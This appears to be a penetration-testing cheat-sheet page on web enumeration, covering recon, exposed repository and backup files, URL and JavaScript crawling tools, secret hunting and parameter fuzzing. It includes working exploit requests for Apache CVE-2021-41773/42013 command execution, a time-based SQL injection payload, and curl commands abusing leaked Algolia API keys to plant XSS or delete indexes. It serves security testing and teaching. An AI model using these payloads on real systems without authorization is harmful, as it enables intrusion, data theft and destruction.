# Web Enumeration [![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA) ## Recon {% hint style="success" %} *Also check for other exposed ports. Ex: 22, look for regsshion, etc. See*[ *Protocols*](/0xss0rz/pentest/protocols.md) {% endhint %} ``` nmap -p 80,443,8000,8080,8180,8888,1000 --open -oA web_discovery -iL scope_list ``` {% embed url="" %} {% embed url="" %} Leverage Shodan and find CVE {% embed url="" %} EyeWitness or Aquatone - **See** [**Information Gathering**](/0xss0rz/pentest/recon/information-gathering.md) {% content-ref url="/pages/eRYeocv9Hb1m8yTiGavV" %} [Fingerprinting / Crawling](/0xss0rz/pentest/recon/fingerprinting-crawling.md) {% endcontent-ref %} {% embed url="" %} {% embed url="" %} ## SSL / TLS {% embed url="" %} {% embed url="" %} ## HTTP/2 - DoS Basic vulnerability scanning to see if web servers may be vulnerable to CVE-2023-44487 {% embed url="" %} ## HTTP Downgrading HTTP downgrading is the process of forcing a request to be processed under HTTP/1.1 instead of HTTP/2. 1. Open Burp Suite and Navigate to Proxy → HTTP History 2. Locate the request that is currently using HTTP/2. 3. Send the Request to Repeater 4. In the Repeater tab, open the "Inspector" panel → Request Attributes → Protocol 5. Change HTTP Version to HTTP/1.1 6. Click "Send" in Repeater. If successful, you should receive a valid response, confirming the server accepts HTTP/1.1. Now, test for request smuggling {% content-ref url="/pages/V1hfs9zunJ3waXeibqj7" %} [HTTP Request Smuggling](/0xss0rz/pentest/web-attacks/http-request-smuggling.md) {% endcontent-ref %} ## HTTP Methods {% embed url="" %} {% content-ref url="/pages/FdfHddWyfvIlPnhkmKMn" %} [HTTP Verb Tampering](/0xss0rz/pentest/web-attacks/http-verb-tampering.md) {% endcontent-ref %} ## Apache Vulnerability Testing {% embed url="" %} {% embed url="" %} {% embed url="" %} * CVE-2021-41773 (RCE and LFI) ``` POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1 Host: 127.0.0.1:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: */* Content-Length: 7 Content-Type: application/x-www-form-urlencoded Connection: close echo;id ``` * CVE-2021-42013 (RCE and LFI) ``` POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1 Host: 127.0.0.1:8080 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 7 echo;id ``` {% embed url="" %} ## Scan for credz {% embed url="" %} ## Header Exploit {% embed url="" %} ## Common files {% embed url="" %} ``` .git .gitkeep .git-rewrite .gitreview .git/HEAD .gitconfig .git/index .git/logs .svnignore .gitattributes .gitmodules .svn/entries .DS_Store .env debug.log backup/ admin.bak database.sql composer.lock ``` `robots.txt` -> robofinder: search for and retrieve historical `robots.txt` files from Archive.org for any given website. {% embed url="" %} `.git` `.svn` `.DS_Store` `.env`
{% embed url="" %} ``` # python ds_store_exp.py http://10.13.X.X/.DS_Store [200] http://10.13.X.X/.DS_Store [200] http://10.13.X.X/JS/.DS_Store [200] http://10.13.X.X/Images/.DS_Store [200] http://10.13.X.X/dev/.DS_Store <--SNIP--> ``` {% embed url="" %} {% embed url="" %} {% embed url="" %} ## Cloudflare ### Real IP adress Tool developed to discover the real IP addresses of web applications protected by Cloudflare. It performs multi-source intelligence gathering through various methods. {% embed url="" %} ### Internal IP leakage `/cdn-cgi/trace` on live hosts — it leaks internal IPs ## sitemap.xml Time based SQL injection: sleep payload `[1;SELECT IF((8303>8302),SLEEP(9),2356)#]` = 9s ``` target[.]com/sitemap.xml?offset=1;SELECT IF((8303>8302),SLEEP(9),2356)# ``` {% content-ref url="/pages/Dh9r9uiMPAgYlFGxZE2L" %} [SQL Injection](/0xss0rz/pentest/web-attacks/sql-injection.md) {% endcontent-ref %} ## Misconfigurations on popular third-party services {% embed url="" %}
{% embed url="" %} ## Git Exposed DotGit Extension - Firefox and Chrome ``` cat domains.txt | nuclei -t gitExposed.yaml ``` Nuclei Template: ```yaml id: git-exposed info: name: Exposed Git Repository author: kaks3c severity: medium description: | Checks for exposed Git repositories by making requests to potential Git repository paths. tags: p3,logs,git http: - raw: - | GET {{BaseURL}}{{path}} HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:119.0) Gecko/20100101 Firefox/119.0 Accept: */* Accept-Language: en-US,en;q=0.5 Connection: close attack: pitchfork payloads: path: - /.git/ - /.git/HEAD - /.git/config - /.git/logs/HEAD - /.git/logs/ - /.git/description - /.git/refs/heads/ - /.git/refs/remotes/ - /.git/objects/ matchers-condition: or matchers: - type: word words: - "commit (initial): Initial commit" #/.git/logs/HEAD - "ref: refs/heads/" #/.git/HEAD - "logallrefupdates = true" #/.git/config - "repositoryformatversion = 0" #/.git/config - "Index of /" #/.git/ - "You do not have permission to access /.git/" #403_/.git - "Unnamed repository; edit this file 'description' to name the repository" #/.git/description - type: regex regex: - "info/\\s+\\d{4}-\\d{2}-\\d{2}\\s+\\d{2}:\\d{2}" #/.git/objects/ - "pack/\\s+\\d{4}-\\d{2}-\\d{2}\\s+\\d{2}:\\d{2}" #/.git/objects/ - "master/\\s+\\d{4}-\\d{2}-\\d{2}\\s+\\d{2}:\\d{2}" #/.git/refs/heads/ - "origin/\\s+\\d{4}-\\d{2}-\\d{2}\\s+\\d{2}:\\d{2}" #/.git/refs/remotes/ - "refs/\\s+\\d{4}-\\d{2}-\\d{2}\\s+\\d{2}:\\d{2}" #/.git/logs/ stop-at-first-match: true ``` `.git` found => download the target `.git` folder ``` wget -r -np -nH --cut-dirs=1 -R "index.html*" http://dev.dumpme.htb/.git/ ``` Or with tools: {% hint style="info" %} *The best tool is goop* {% endhint %} {% embed url="" %} ``` $ git clone https://github.com/deletescape/goop $ cd goop $ go build $ ./goop http://dev.dumpme.htb ``` {% embed url="" %} {% embed url="" %} {% embed url="" %} After that, search for creds, vulnerabilities, etc: {% content-ref url="/pages/prJN0YrAWHmLEt6Z1Wkv" %} [Credentials in git repos](/0xss0rz/pentest/recon/osint/credentials-in-git-repos.md) {% endcontent-ref %} {% content-ref url="/pages/lFZao0RJ0EteX7edGc1w" %} [GitHub - finding vulnerabilities](/0xss0rz/pentest/recon/osint/github-finding-vulnerabilities.md) {% endcontent-ref %} ## SVN Expoxed {% embed url="" %} ``` ./svn-extractor.py --url http://url.com --match database.php ``` ## PHPMyAdmin `target[.]com/phpmyadmin/setup/index.php` ==> 301 to login page `target[.]com/phpMyAdmin/setup/index.php` ==> 200 to phpmyadmin setup ## AdminDirectoryFinder {% embed url="" %} ## WSAAR {% embed url="" %} ## OWASP Noir {% embed url="" %} ``` $ noir -b . -u http://example.com $ noir -b . -u http://example.com --passive-scan ``` ## Grab All URLs ```shellscript #!/bin/bash # Demander l'emplacement du fichier scope.txt read -p "Entre l'emplacement du fichier scope.txt : " scope_file # Vérifier si le fichier existe if [ ! -f "$scope_file" ]; then echo "Erreur : Le fichier '$scope_file' n'existe pas." exit 1 fi # Créer un fichier avec https:// devant chaque ligne echo "Préparation du fichier avec https://..." sed 's|^|https://|' "$scope_file" > scope_https.txt # Lancer waybackurls echo "Lancement de waybackurls..." cat "$scope_file" | waybackurls > wayback.scope # Lancer gau echo "Lancement de gau..." cat "$scope_file" | gau > gau.txt # Lancer katana echo "Lancement de katana..." /home/thomas/Bureau/Tools/crawler/katana -list "$scope_file" -o katana.txt # Lancer hakrawler echo "Lancement de hakrawler..." cat scope_https.txt | hakrawler > hakrawler.txt # Lancer cariddi echo "Lancement de cariddi..." cat scope_https.txt | /home/thomas/Bureau/Tools/crawler/cariddi -ot cariddi.txt mv output-cariddi/cariddi.txt.results.txt cariddi.txt # Lancer urlfinder echo "Lancement de urlfinder..." /home/thomas/Bureau/Tools/crawler/urlfinder -list "$scope_file" -o urlfinder.txt echo "Terminé !" echo "- waybackurls : wayback.scope" echo "- gau : gau.txt" echo "- katana : katana.txt" echo "- hakrawler : hakrawler.txt" echo "- cariddi : cariddi.txt" echo "- urlfinder : urlfinder.txt" # Fusionner tous les fichiers et enlever les doublons echo "" echo "Fusion de tous les résultats et suppression des doublons..." cat wayback.scope gau.txt katana.txt hakrawler.txt cariddi.txt urlfinder.txt | sort -u > urls_final.txt echo "✓ Fusion terminée ! Résultat dans : urls_final.txt" echo "Nombre total d'URLs uniques : $(wc -l < urls_final.txt)" ``` ## URLScan.io Check URLScan as a complement to Wayback Machine {% content-ref url="/pages/ziUET1mKbgC3HbH4BP0f" %} [Information Gathering](/0xss0rz/pentest/recon/information-gathering.md) {% endcontent-ref %} ## Postman
Domain name -> Workspace type Public ## WaybackLister Reconnaissance tool that taps into the Wayback Machine to fetch historical URLs for a domain, parses unique paths, and checks if any of those paths currently expose **directory listings** {% embed url="" %} ``` python waybacklister.py -d target.com ``` ## Wayback Machine {% embed url="" %} ``` # RECON METHOD BY ~/.COFFINXP https://web.archive.org/cdx/search/cdx?url=*.example.com/*&collapse=urlkey&output=text&fl=original curl -G "https://web.archive.org/cdx/search/cdx" --data-urlencode "url=*.example.com/*" --data-urlencode "collapse=urlkey" --data-urlencode "output=text" --data-urlencode "fl=original" > out.txt cat out.txt | uro | grep -E '\.xls|\.xml|\.xlsx|\.json|\.pdf|\.sql|\.doc|\.docx|\.pptx|\.txt|\.zip|\.tar\.gz|\.tgz|\.bak|\.7z|\.rar|\.log|\.cache|\.secret|\.db|\.backup|\.yml|\.gz|\.config|\.csv|\.yaml|\.md|\.md5|\.exe|\.dll|\.bin|\.ini|\.bat|\.sh|\.tar|\.deb|\.rpm|\.iso|\.img|\.apk|\.msi|\.dmg|\.tmp|\.crt|\.pem|\.key|\.pub|\.asc' ``` {% content-ref url="/pages/ziUET1mKbgC3HbH4BP0f" %} [Information Gathering](/0xss0rz/pentest/recon/information-gathering.md) {% endcontent-ref %} {% embed url="" %} {% embed url="" %} ``` waymore -i target.com -mode U -oU urls.txt ``` Download pages and extract JS (mode R) ``` waymore -i target.com -mode R --output-inline-js -ko "\.js$" -oR jsdump/* ``` {% embed url="" %} {% embed url="" %} ## JWTxplorer Scan public archives like the **Wayback Machine**, extracts leaked **JWT tokens**, and decodes them to identify potentially exploitable information. {% embed url="" %} ## Backup Files ``` ffuf -w subdomains.txt:SUB -w payloads/backup_files_only.txt:FILE -u https://SUB/FILE -mc 200 -rate 50 -fs 0 -c -x http://localip:8080 ``` {% embed url="" %} ### Fuzzili {% embed url="" %} ``` echo http://target.com | fuzzuli -p ``` ### Burp Extension {% embed url="" %} ## Archived Backups {% embed url="" %} {% embed url="" %} Look for metadata ## Extract URLs and paths from web pages ### Manually {% embed url="" %} {% embed url="" %} ``` javascript:(function(){var scripts=document.getElementsByTagName("script"),regex=/(?<=(\"|\'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\`))/g;const results=new Set;for(var i=0;i")})}setTimeout(writeResults,3e3);})(); ``` Open Console (ctrl + shift + i) + `Allow pasting` ("`autoriser le collage`") + copy paste JS code + click on bookmark
Source: NahamCon2024: .js Files Are Your Friends | @zseano Extensions to run Javascript - No need to use the console {% embed url="" %} {% embed url="" %} Code to get URLs and unhide elements - Credits: `@coffinxp` ``` javascript:(function(){if(document.getElementById('lostsec-scanner'))return;let e=!1,t=[],n=document.createElement('div');n.id='lostsec-scanner',n.style='position:fixed;bottom:0;left:0;width:100%;height:350px;background:#181818;color:#00bcd4;z-index:999999;padding:20px;font-family:monospace;box-shadow:0 -2px 10px rgba(0,0,0,0.7);border-top:2px solid #00bcd4;overflow:hidden;';let o=document.createElement('div');o.style='position:absolute;top:0;left:0;width:100%;height:10px;background:#222;cursor:ns-resize;',n.appendChild(o);let i=!1,a=0,l=0;o.addEventListener('mousedown',r=>{i=!0,a=r.clientY,l=n.offsetHeight,r.preventDefault()});function d(r){if(i){let d=l-(r.clientY-a);d=Math.max(200,Math.min(d,window.innerHeight*.9)),n.style.height=d+'px';let s=document.getElementById('results-wrapper');s&&(s.style.maxHeight=d-140+'px')}}function c(){i=!1}document.addEventListener('mousemove',d),document.addEventListener('mouseup',c);let s=document.createElement('div');s.textContent='❌',s.style='position:absolute;top:10px;right:20px;font-size:18px;color:#ff4081;cursor:pointer;';function u(){e=!0,document.removeEventListener('mousemove',d),document.removeEventListener('mouseup',c),document.removeEventListener('keydown',f),n.remove(),t.forEach(e=>e.abort())}s.onclick=u,n.appendChild(s);let m=document.createElement('h3');m.textContent='🔍 Lostsec Uncover',m.style='margin:10px 0;color:#00bcd4;',n.appendChild(m);let v=document.createElement('input');v.placeholder='Search URLs...',v.style='width:100%;padding:6px;margin-bottom:10px;border-radius:4px;border:none;font-size:14px;outline:none;background:#222;color:#00bcd4;',n.appendChild(v);let y=document.createElement('div');y.style='margin-bottom:10px;display:flex;gap:10px;flex-wrap:wrap;';let h=document.createElement('button');h.textContent='📋 Copy All',h.style='padding:5px 10px;background:#222;color:#00bcd4;border:none;border-radius:3px;cursor:pointer;';let g=document.createElement('button');g.textContent='⬇️ Export .txt',g.style='padding:5px 10px;background:#222;color:#00bcd4;border:none;border-radius:3px;cursor:pointer;';let z=document.createElement('button');z.textContent='🪄 Unhide Elements',z.style='padding:5px 10px;background:#222;color:#00bcd4;border:none;border-radius:3px;cursor:pointer;';z.onclick=()=>{document.querySelectorAll('[disabled],[readonly]').forEach(el=>{el.removeAttribute('disabled');el.removeAttribute('readonly');});document.querySelectorAll('[style*="display: none"],.hidden').forEach(el=>{el.style.display='block';});document.querySelectorAll('[style*="pointer-events: none"],.grayed').forEach(el=>{el.style.pointerEvents='auto';el.style.opacity='1';});alert('✅ Disabled, readonly, and hidden elements are now active!');};let p=document.createElement('label');p.style='display:flex;align-items:center;gap:5px;color:#00bcd4;font-size:14px;cursor:pointer;';let b=document.createElement('input');b.type='checkbox',p.appendChild(b),p.appendChild(document.createTextNode('Domain only')),y.appendChild(h),y.appendChild(g),y.appendChild(z),y.appendChild(p),n.appendChild(y);let w=document.createElement('div');w.id='results',w.style='margin-top:10px;color:#00bcd4;';let k=document.createElement('div');k.id='results-wrapper',k.style='background:#222;padding:10px;border-radius:5px;max-height:180px;overflow:auto;margin-top:10px;',n.appendChild(w),n.appendChild(k),document.body.appendChild(n);let x=new URL(window.location.href).hostname;function f(r){'Escape'===r.key&&u()}document.addEventListener('keydown',f);let totalScripts=0,processedScripts=0,foundSet=new Set,domUrls=[];function updateProgress(){w.innerHTML=`
Scanning... (${processedScripts}/${totalScripts} scripts processed)
`}function updateResults(){let arr=[...new Set([...domUrls,...foundSet])];C=arr,T(arr)}async function scanExternalScripts(){let scripts=document.getElementsByTagName('script');totalScripts=Array.from(scripts).filter(s=>s.src).length,processedScripts=0;let regex=/["'`]\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=["'`])/g,promises=[];for(let s of scripts)if(s.src){let ctrl=new AbortController;t.push(ctrl),promises.push(fetch(s.src,{signal:ctrl.signal}).then(r=>r.text()).then(text=>{if(e)return;let matches=text.matchAll(regex);for(let m of matches)foundSet.add(m[0]);processedScripts++,updateProgress(),updateResults()}).catch(err=>{processedScripts++,updateProgress();'AbortError'!==err.name&&console.error(err)}))}await Promise.all(promises)}function L(){let e=new Set;document.querySelectorAll('a,script,img,link,form').forEach(t=>{t.href&&e.add(t.href),t.src&&e.add(t.src),t.action&&e.add(t.action)});let n=document.documentElement.innerHTML,o=/(?:url\(|href=|src=|action=|url:|endpoint:|path:|route:)\s*["']?([^"')\s>]+)(?=["'>\s])/gi,i;for(;null!==(i=o.exec(n));)i[1]&&!i[1].startsWith('data:')&&e.add(i[1]);(n.match(/"[^"]*"|'[^']*'/g)||[]).forEach(t=>{let n=/(?:\/[a-zA-Z0-9_-]+)+(?:\.[a-zA-Z0-9]+)?/g,o=t.match(n)||[];o.forEach(t=>e.add(t))}),performance.getEntriesByType('resource').forEach(t=>e.add(t.name));return Array.from(e).sort()}function T(n){k.innerHTML='';let o=n.filter(t=>{if(b.checked&&!t.includes(x))return!1;let n=v.value.toLowerCase();return!(n&&!t.toLowerCase().includes(n))});o.forEach(e=>{let t=document.createElement('div');t.style='color:#fff;margin:4px 0;padding:5px;background:#333;border-radius:3px;word-break:break-all;',t.textContent=e,k.appendChild(t)})}function U(e){return e.filter(t=>{if(b.checked&&!t.includes(x))return!1;let n=v.value.toLowerCase();return!(n&&!t.toLowerCase().includes(n))})}let C=[];v.addEventListener('input',()=>T(C)),b.addEventListener('change',()=>T(C)),h.addEventListener('click',()=>{let e=U(C);navigator.clipboard.writeText(e.join('\n')).then(()=>alert('✅ URLs copied!'))}),g.addEventListener('click',()=>{let e=U(C),t=new Blob([e.join('\n')]),n=document.createElement('a');n.href=URL.createObjectURL(t),n.download='lostsec_urls.txt',n.click()}),function init(){w.textContent='Scanning...';domUrls=L(),updateResults(),scanExternalScripts().then(()=>{if(e)return;w.innerHTML=`
✅ Scan complete! Found ${C.length} unique URLs & Endpoints on ${x}
`,T(C)}).catch(n=>{if(e)return;console.error(n),w.textContent='❌ Error during scan. Check console for details.'})}();})(); ``` ### [Crawling](#crawling-1) ### Carridi {% embed url="" %} ``` $ echo https://target.com/ | cariddi $ cat target.txt | carridi ``` ### Gourlex ``` gourlex -t domain.com ``` {% embed url="" %} ### xnLinkFinder {% embed url="" %} ``` xnLinkfinder -i bugcrowd.com -sp https://www.bugcrowd.com -sf "bugcrowd.*" -d2 -v ``` Command breakdown: ``` -i http://bugcrowd.com → Target domain -sp https://bugcrowd.com → Scope prefix -sf "bugcrowd.*" → Scope filter -d 2 → Crawl depth https://github.com/mhmdiaa/chronos -v → Verbose output ``` ### Hakrawler {% embed url="" %} ``` echo https://google.com | hakrawler ``` ### Waybackurls {% embed url="" %} ### Katana & Urlfinder ``` katana -u https://tesla.com ``` {% embed url="" %} ``` urlfinder -d tesla.com ``` {% embed url="" %} ### GetAllURL - gau {% embed url="" %} ``` gau https://target.com ``` ### LinkFinder {% embed url="" %} ``` python3 linkfinder.py -i https://example.com/app.js ``` ``` $ python linkfinder.py -i 'js/*' -o result.html $ python linkfinder.py -i 'js/*' -o cli ``` ### GoLinkFinder Faster than LinkFinder {% embed url="" %} ``` golinkfinder -file js_files.txt -output results.json ``` ### LazyEgg {% embed url="" %} ### ReconSpider See [Fingerprinting / Crawling](/0xss0rz/pentest/recon/fingerprinting-crawling.md) ## BadSecrets - Cookies {% embed url="" %} | Name | Description | | -------------------------- | -------------------------------------------------------------------------------------------------------------------------------------- | | ASPNET\_Viewstate | Checks the viewstate/generator against a list of known machine keys. | | Telerik\_HashKey | Checks patched (2017+) versions of Telerik UI for a known Telerik.Upload.ConfigurationHashKey | | Telerik\_EncryptionKey | Checks patched (2017+) versions of Telerik UI for a known Telerik.Web.UI.DialogParametersEncryptionKey | | Flask\_SignedCookies | Checks for weak Flask cookie signing password. Wrapper for [flask-unsign](https://github.com/Paradoxis/Flask-Unsign) | | Peoplesoft\_PSToken | Can check a peoplesoft PS\_TOKEN for a bad/weak signing password | | Django\_SignedCookies | Checks django's session cookies (when in signed\_cookie mode) for known django secret\_key | | Rails\_SecretKeyBase | Checks Ruby on Rails signed or encrypted session cookies (from multiple major releases) for known secret\_key\_base | | Generic\_JWT | Checks JWTs for known HMAC secrets or RSA private keys | | Jsf\_viewstate | Checks Both Mojarra and Myfaces implimentations of Java Server Faces (JSF) for use of known or weak secret keys | | Symfony\_SignedURL | Checks symfony "\_fragment" urls for known HMAC key. Operates on Full URL, including hash | | Express\_SignedCookies\_ES | Checks express.js express-session middleware for signed cookies and session cookies for known 'session secret' | | Express\_SignedCookies\_CS | Checks express.js cookie-session middleware for signed cookies and session cookies for known secret | | Laravel\_SignedCookies | Checks 'laravel\_session' cookies for known laravel 'APP\_KEY' | | ASPNET\_Vstate | Checks for a once popular custom compressed Viewstate [code snippet](https://blog.sorcery.ie/posts/higherlogic_rce/) vulnerable to RCE | | Rack2\_SignedCookies | Checks Rack 2.x signed cookies for known secret keys | | Yii2\_SignedCookies | Checks Yii2 framework signed cookies for known cookie validation keys | ## Secrets in Response Detects sensitive information leaks in HTTP responses using custom regex-based signatures {% embed url="" %} ## Metadata {% content-ref url="/pages/PzxWrp79GI8EdtkRI6p9" %} [Metadata and Hidden infos](/0xss0rz/pentest/recon/osint/metadata-and-hidden-infos.md) {% endcontent-ref %} ## JS Files ### Sensitive JS Files ``` ffuf -w subdomains.txt:SUB -w payloads/senstivejs.txt:FILE -u https://SUB/FILE -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0" -fs 0 -c -mc 200 -fr false -rate 10 -t 10 ``` {% embed url="" %} ``` /js/config.js /js/credentials.js /js/secrets.js /js/keys.js /js/password.js /js/api_keys.js /js/auth_tokens.js /js/access_tokens.js /js/sessions.js /js/authorization.js /js/encryption.js /js/certificates.js /js/ssl_keys.js /js/passphrases.js /js/policies.js /js/permissions.js /js/privileges.js /js/hashes.js /js/salts.js /js/nonces.js /js/signatures.js /js/digests.js /js/tokens.js /js/cookies.js /js/topsecr3tdonotlook.js ``` ### Burp
Source: NahamCon2024: *.js Files Are Your Friends* | @zseano {% embed url="" %}
``` wget -i urls.txt ``` Detect secrets ``` ./trufflehog filesystem ~/Downloads/js --no-verification --include-detectors="all" ``` Burp Extension {% embed url="" %} Code Analysis {% content-ref url="/pages/aOTJAYAkbZbDV7Iij03k" %} [Code Analysis](/0xss0rz/pentest/code-analysis.md) {% endcontent-ref %} ``` semgrep scan --config auto ```
### JSFScan.sh ``` 1 - Gather Jsfile Links from different sources. 2 - Import File Containing JSUrls 3 - Extract Endpoints from Jsfiles 4 - Find Secrets from Jsfiles 5 - Get Jsfiles store locally for manual analysis 6 - Make a Wordlist from Jsfiles 7 - Extract Variable names from jsfiles for possible XSS. 8 - Scan JsFiles For DomXSS. 9 - Generate Html Report. ``` {% embed url="" %} ``` bash JFScan.sh -l target.txt --all -r -o outputdir ``` {% embed url="" %} ### Morgan Identify sensitive information, vulnerabilities, and potential risks within JavaScript files on websites {% embed url="" %} ### Gouge - Burp extension to extract URLs which are seen in JS files {% embed url="" %} ### GetJS {% embed url="" %} ### JSHunter Endpoint Extraction and Sensitive Data Detection ``` cat urls.txt | grep "\.js" | jshunter ``` {% embed url="" %} ### Javascript Deobfuscator {% embed url="" %} Online {% embed url="" %} ## API Endpoint - Burp History {% embed url="" %}
## API Endpoint in JS File ``` cat file.js | grep -aoP "(?<=(\"|\'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\`))" | sort -u ``` ### JSNinja {% embed url="" %} ### JS Link Finder {% embed url="" %} ### Jsluice {% embed url="" %} {% embed url="" %} {% content-ref url="/pages/XFMFG4djX40RJT1RB02r" %} [API](/0xss0rz/pentest/api.md) {% endcontent-ref %} ## Sensitive data in JS Files Top 25 JavaScript path files used to store sensitive information ``` /js/config.js /js/credentials.js /js/secrets.js /js/keys.js /js/password.js /js/api_keys.js /js/auth_tokens.js /js/access_tokens.js /js/sessions.js /js/authorization.js /js/encryption.js /js/certificates.js /js/ssl_keys.js /js/passphrases.js /js/policies.js /js/permissions.js /js/privileges.js /js/hashes.js /js/salts.js /js/nonces.js /js/signatures.js /js/digests.js /js/tokens.js /js/cookies.js /js/topsecr3tdonotlook.js ``` {% embed url="" %} {% embed url="" %}
{% content-ref url="/pages/sMiDxTVbbdYwwlcTWYY3" %} [Sensitive Data (API Key, JWT token, etc.) Exposed](/0xss0rz/pentest/api/sensitive-data-api-key-jwt-token-etc.-exposed.md) {% endcontent-ref %} ### JS Miner - Burp Extension ### X-Keys - Burp Extension {% embed url="" %} ### jsluice++ - Burp Extension {% embed url="" %}
### SecretFinder {% embed url="" %} ### JS-Snitch {% embed url="" %} ### Mantra {% embed url="" %} ## Testing API Key {% embed url="" %} ### Google API Key For years, Google API keys (AIza...) had little to no real-world impact. \ But recently, many of them unexpectedly gained access to **Google Gemini** ``` curl "https://generativelanguage.googleapis.com/v1/models?key=YOU_KEY_HERE" ``` ### Google Maps API Key {% embed url="" %} ### Algolia API Key Tool {% embed url="" %} Manual Testing {% embed url="" %} {% embed url="" %} {% embed url="" %} Check ACL: ``` https://APPID-dsn.algolia.net/1/keys/APIKEY?x-algolia-application-id=APPID&x-algolia-api-key=APIKEY ``` The most damaging permissions are * **addObject**: Allows adding/updating an object in the index. (Copying/moving indices are also allowed with this permission.) * **deleteObject**: Allows deleting an existing object. * **deleteIndex**: Allows deleting an index (will break search completely) * **editSettings**: Allows changing index settings. - this also allows you to run javascript when the search is used. * **listIndexes**: Allows listing all accessible indices. * **logs**: this will allow you to view the search logs, which can include IP Addresses and sensitive cookies. Abuse editSettings to put an XSS paylaod: ``` curl --request PUT \ --url https://-1.algolianet.com/1/indexes//settings \ --header 'content-type: application/json' \ --header 'x-algolia-api-key: ' \ --header 'x-algolia-application-id: ' \ --data '{"highlightPreTag": ""}' ``` List indexes ``` curl -X GET \ "https://{appID}-dsn.algolia.net/1/indexes/" \ -H "X-Algolia-API-Key: {api-key}" \ -H "X-Algolia-Application-Id: {appID}" ``` Retrieve/read the data of a resource from the server: * settings ``` curl --url https://-1.algolianet.com/1/indexes//settings --header 'content-type: application/json' --header 'x-algolia-api-key: ' --header 'x-algolia-application-id: ' ``` * Specific index ``` curl -X GET \ "https://{appID}-dsn.algolia.net/1/indexes/{index_name}" \ -H "X-Algolia-API-Key: {apikey}" \ -H "X-Algolia-Application-Id: {appID}" ``` Update a resource on the server. ``` curl -X PATCH --url https://-1.algolianet.com/1/indexes//settings --header 'content-type: application/json' --header 'x-algolia-api-key: ' --header 'x-algolia-application-id: ' --data '{"highlightPreTag": "This is hacked"}' ``` Delete Index - **DON'T DO THIS ON PRODUCTION ENVIRONMENT** ``` curl -X DELETE \ "https://{appID}-dsn.algolia.net/1/indexes/Index_name?x-algolia-application-id={appID}&x-algolia-api-key={apiKey}" ``` ## Hidden Parameter This useful option in Burp Suite makes every hidden input field (often with a reference to a hidden parameter) visible Proxy Settings >>> Response modification rules >>> Unhide hidden form fields
## Parameters fuzzing ``` debug=true test=1 admin=1 isAdmin=true isPremium=true superuser=1 role=user → flip to admin uid=42 userid=42 account=42 profile=42 ref=partner → flip to internal partnerId=1 ``` ### Burp - Param Miner right-click, extension>Param Miner> Guess params> Guess GET parameters.
### Burp - GAP GetAllParams {% embed url="" %} ### x8 Hidden parameters discovery {% embed url="" %} ### Arjun {% embed url="" %} {% embed url="" %} ``` $ python3 /opt/Arjun/arjun.py -u http://target_address.com $ python3 /opt/Arjun/arjun.py -u http://target_address.com -o arjun_results.json ``` If you’ve been proxying traffic with Burp Suite, you can select all URLs within the sitemap, use the Copy Selected URLs option, and paste that list to a text file. Then run Arjun against all Burp Suite targets simultaneously, like this: ``` $ python3 /opt/Arjun/arjun.py -i burp_targets.txt ``` ### Parmahunter {% embed url="" %} ## Wordlists {% hint style="success" %} *Try `/usr/share/wordlists/seclists/Discovery/Web-Content/quickhits.txt` first, then* [*https://github.com/Karanxa/Bug-Bounty-Wordlists/blob/main/fuzz.txt*](https://github.com/Karanxa/Bug-Bounty-Wordlists/blob/main/fuzz.txt) {% endhint %} {% content-ref url="/pages/uDePbcQDhOjtjRKV8h1f" %} [Fuzzing](/0xss0rz/pentest/web-attacks/fuzzing.md) {% endcontent-ref %} {% embed url="" %} {% embed url="" %} {% embed url="" %} * dirb lists * * SecList: * BugBounty All Fuzz: * Common extensions: `raft-[ small | medium | large ]-extensions.txt` from SecList Web-Content * Create wordlist - CeWL ```shell-session cewl -m5 --lowercase -w wordlist.txt http://192.168.10.10 ``` ### Fuzz using different HTTP methods ``` ffuf -u https://api.example.com/PATH -X METHOD -w /path/to/wordlist:PATH -w /path/to/http_methods:METHOD ``` ### Admin interfaces {% embed url="" %} ### Backups {% embed url="" %} {% embed url="" %} ### Config files {% embed url="" %} {% embed url="" %} {% embed url="" %} ### SQL files {% embed url="" %} ## Vulnerability Assessment {% content-ref url="/pages/Nzygyq2EDupbf0SJBJkV" %} [Vulnerability Scanners](/0xss0rz/pentest/tools/vulnerability-scanners.md) {% endcontent-ref %} {% content-ref url="/pages/gz8RUAKUyAyO1jJkDVU1" %} [Port Scan](/0xss0rz/pentest/protocols/port-scan.md) {% endcontent-ref %} ```shell-session sudo nmap 10.129.2.28 -p 80 -sV --script vuln Nmap scan report for 10.129.2.28 Host is up (0.036s latency). PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) | http-enum: | /wp-login.php: Possible admin folder | /readme.html: Wordpress version: 2 | /: WordPress version: 5.3.4 | /wp-includes/images/rss.png: Wordpress version 2.2 found. | /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found. | /wp-includes/images/blank.gif: Wordpress version 2.6 found. | /wp-includes/js/comment-reply.js: Wordpress version 2.7 found. | /wp-login.php: Wordpress login page. | /wp-admin/upgrade.php: Wordpress login page. |_ /readme.html: Interesting, a readme. |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. | http-wordpress-users: | Username found: admin |_Search stopped at ID #25. Increase the upper limit if necessary with 'http-wordpress-users.limit' | vulners: | cpe:/a:apache:http_server:2.4.29: | CVE-2019-0211 7.2 https://vulners.com/cve/CVE-2019-0211 | CVE-2018-1312 6.8 